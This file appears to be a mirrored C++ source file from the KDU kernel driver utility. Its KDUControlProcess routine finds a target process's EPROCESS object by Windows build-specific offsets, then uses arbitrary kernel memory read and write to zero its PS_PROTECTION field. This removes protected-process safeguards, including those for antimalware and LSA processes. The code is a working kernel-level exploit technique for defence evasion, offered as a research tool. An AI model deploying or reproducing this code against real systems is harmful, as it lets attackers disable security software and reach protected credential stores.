mirror of https://github.com/hfiref0x/KDU.git
234 lines
6.6 KiB
C++
234 lines
6.6 KiB
C++
/*******************************************************************************
|
|
*
|
|
* (C) COPYRIGHT AUTHORS, 2018 - 2020
|
|
*
|
|
* TITLE: PS.CPP
|
|
*
|
|
* VERSION: 1.00
|
|
*
|
|
* DATE: 02 Feb 2020
|
|
*
|
|
* Processes DKOM related routines.
|
|
*
|
|
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
|
|
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
|
|
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
|
|
* PARTICULAR PURPOSE.
|
|
*
|
|
*******************************************************************************/
|
|
|
|
#include "global.h"
|
|
|
|
LPSTR KDUGetProtectionTypeAsString(
|
|
_In_ ULONG Type
|
|
)
|
|
{
|
|
LPSTR pStr;
|
|
|
|
switch (Type) {
|
|
|
|
case PsProtectedTypeNone:
|
|
pStr = (LPSTR)"PsProtectedTypeNone";
|
|
break;
|
|
case PsProtectedTypeProtectedLight:
|
|
pStr = (LPSTR)"PsProtectedTypeProtectedLight";
|
|
break;
|
|
case PsProtectedTypeProtected:
|
|
pStr = (LPSTR)"PsProtectedTypeProtected";
|
|
break;
|
|
default:
|
|
pStr = (LPSTR)"Unknown Type";
|
|
break;
|
|
}
|
|
|
|
return pStr;
|
|
}
|
|
|
|
LPSTR KDUGetProtectionSignerAsString(
|
|
_In_ ULONG Signer
|
|
)
|
|
{
|
|
LPSTR pStr;
|
|
|
|
switch (Signer) {
|
|
case PsProtectedSignerNone:
|
|
pStr = (LPSTR)"PsProtectedSignerNone";
|
|
break;
|
|
case PsProtectedSignerAuthenticode:
|
|
pStr = (LPSTR)"PsProtectedSignerAuthenticode";
|
|
break;
|
|
case PsProtectedSignerCodeGen:
|
|
pStr = (LPSTR)"PsProtectedSignerCodeGen";
|
|
break;
|
|
case PsProtectedSignerAntimalware:
|
|
pStr = (LPSTR)"PsProtectedSignerAntimalware";
|
|
break;
|
|
case PsProtectedSignerLsa:
|
|
pStr = (LPSTR)"PsProtectedSignerLsa";
|
|
break;
|
|
case PsProtectedSignerWindows:
|
|
pStr = (LPSTR)"PsProtectedSignerWindows";
|
|
break;
|
|
case PsProtectedSignerWinTcb:
|
|
pStr = (LPSTR)"PsProtectedSignerWinTcb";
|
|
break;
|
|
case PsProtectedSignerWinSystem:
|
|
pStr = (LPSTR)"PsProtectedSignerWinSystem";
|
|
break;
|
|
case PsProtectedSignerApp:
|
|
pStr = (LPSTR)"PsProtectedSignerApp";
|
|
break;
|
|
default:
|
|
pStr = (LPSTR)"Unknown Value";
|
|
break;
|
|
}
|
|
|
|
return pStr;
|
|
}
|
|
|
|
/*
|
|
* KDUControlProcess
|
|
*
|
|
* Purpose:
|
|
*
|
|
* Modify process object to remove PsProtectedProcess access restrictions.
|
|
*
|
|
*/
|
|
BOOL KDUControlProcess(
|
|
_In_ PKDU_CONTEXT Context,
|
|
_In_ ULONG_PTR ProcessId)
|
|
{
|
|
BOOL bResult = FALSE;
|
|
ULONG Buffer;
|
|
NTSTATUS ntStatus;
|
|
ULONG_PTR ProcessObject = 0, VirtualAddress = 0, Offset = 0;
|
|
HANDLE hProcess = NULL;
|
|
|
|
CLIENT_ID clientId;
|
|
OBJECT_ATTRIBUTES obja;
|
|
|
|
PS_PROTECTION* PsProtection;
|
|
|
|
printf_s("[>] Entering %s\r\n", __FUNCTION__);
|
|
|
|
InitializeObjectAttributes(&obja, NULL, 0, 0, 0);
|
|
|
|
clientId.UniqueProcess = (HANDLE)ProcessId;
|
|
clientId.UniqueThread = NULL;
|
|
|
|
ntStatus = NtOpenProcess(&hProcess, PROCESS_QUERY_LIMITED_INFORMATION,
|
|
&obja, &clientId);
|
|
|
|
if (NT_SUCCESS(ntStatus)) {
|
|
|
|
printf_s("[+] Process with PID %llu opened (PROCESS_QUERY_LIMITED_INFORMATION)\r\n", ProcessId);
|
|
supQueryObjectFromHandle(hProcess, &ProcessObject);
|
|
|
|
if (ProcessObject != 0) {
|
|
|
|
printf_s("[+] Process object (EPROCESS) found, 0x%llX\r\n", ProcessObject);
|
|
|
|
switch (Context->NtBuildNumber) {
|
|
case 9600:
|
|
Offset = PsProtectionOffset_9600;
|
|
break;
|
|
case 10240:
|
|
Offset = PsProtectionOffset_10240;
|
|
break;
|
|
case 10586:
|
|
Offset = PsProtectionOffset_10586;
|
|
break;
|
|
case 14393:
|
|
Offset = PsProtectionOffset_14393;
|
|
break;
|
|
case 15063:
|
|
case 16299:
|
|
case 17134:
|
|
case 17763:
|
|
case 18362:
|
|
case 18363:
|
|
Offset = PsProtectionOffset_15063;
|
|
break;
|
|
case 19037:
|
|
Offset = PsProtectionOffset_19037;
|
|
break;
|
|
default:
|
|
Offset = 0;
|
|
break;
|
|
}
|
|
|
|
if (Offset == 0) {
|
|
printf_s("[!] Unsupported WinNT version\r\n");
|
|
}
|
|
else {
|
|
|
|
VirtualAddress = EPROCESS_TO_PROTECTION(ProcessObject, Offset);
|
|
|
|
printf_s("[+] EPROCESS->PS_PROTECTION, 0x%llX\r\n", VirtualAddress);
|
|
|
|
Buffer = 0;
|
|
if (KDUReadKernelVM(Context, VirtualAddress, &Buffer, sizeof(ULONG))) {
|
|
|
|
PsProtection = (PS_PROTECTION*)&Buffer;
|
|
|
|
LPSTR pStr;
|
|
|
|
|
|
printf_s("[+] Kernel memory read succeeded\r\n");
|
|
|
|
pStr = KDUGetProtectionTypeAsString(PsProtection->Type);
|
|
printf_s("\tPsProtection->Type: %lu (%s)\r\n",
|
|
PsProtection->Type,
|
|
pStr);
|
|
|
|
printf_s("\tPsProtection->Audit: %lu\r\n", PsProtection->Audit);
|
|
|
|
pStr = KDUGetProtectionSignerAsString(PsProtection->Signer);
|
|
printf_s("\tPsProtection->Signer: %lu (%s)\r\n",
|
|
PsProtection->Signer,
|
|
pStr);
|
|
|
|
PsProtection->Signer = PsProtectedSignerNone;
|
|
PsProtection->Type = PsProtectedTypeNone;
|
|
PsProtection->Audit = 0;
|
|
|
|
bResult = KDUWriteKernelVM(Context, VirtualAddress, &Buffer, sizeof(ULONG));
|
|
if (bResult) {
|
|
printf_s("[+] Process object modified\r\n");
|
|
|
|
pStr = KDUGetProtectionTypeAsString(PsProtection->Type);
|
|
printf_s("\tNew PsProtection->Type: %lu (%s)\r\n",
|
|
PsProtection->Type,
|
|
pStr);
|
|
|
|
pStr = KDUGetProtectionSignerAsString(PsProtection->Signer);
|
|
printf_s("\tNew PsProtection->Signer: %lu (%s)\r\n",
|
|
PsProtection->Signer,
|
|
pStr);
|
|
|
|
printf_s("\tNew PsProtection->Audit: %lu\r\n", PsProtection->Audit);
|
|
|
|
}
|
|
else {
|
|
printf_s("[!] Cannot modify process object\r\n");
|
|
}
|
|
}
|
|
else {
|
|
printf_s("[!] Cannot read kernel memory\r\n");
|
|
}
|
|
}
|
|
}
|
|
else {
|
|
printf_s("[!] Cannot query process object\r\n");
|
|
}
|
|
NtClose(hProcess);
|
|
}
|
|
else {
|
|
printf_s("[!] Cannot open target process, NTSTATUS (0x%lX)\r\n", ntStatus);
|
|
}
|
|
|
|
printf_s("[<] Leaving %s\r\n", __FUNCTION__);
|
|
|
|
return bResult;
|
|
}
|